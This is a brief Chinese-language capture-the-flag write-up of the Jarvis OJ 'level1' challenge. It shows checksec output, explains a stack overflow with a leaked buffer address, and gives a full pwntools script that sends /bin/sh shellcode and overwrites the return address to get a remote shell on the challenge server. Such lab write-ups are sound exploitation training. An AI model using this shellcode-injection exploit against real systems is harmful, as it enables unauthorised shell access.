jarvis oj level1

还是先checksec

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

发现数据部分可以执行，先看ida，同样是vulnerable处有栈溢出漏洞，同时程序泄露了buf缓冲区的地址，因此我们考虑将shellcode写入数据部分，然后将返回地址修改为shellcode的地址。
构造payload=shellcode+padding+地址，脚本如下：

from pwn import *
context.log_level="debug"
p=remote("pwn2.jarvisoj.com",9877)
e=ELF("level1")
shel=asm(shellcraft.sh())
t=p.recvline()
buf_addr=t[14:-2]       #获取buf地址
print(buf_addr)
payload=shel+'a'*(0x88+0x4-len(shel))+p32(int(buf_addr,16))
p.send(payload)
p.interactive()
p.close()

几个收获：
了解pwntools的构造shellcode方法，在nx未开启时的pwn方法。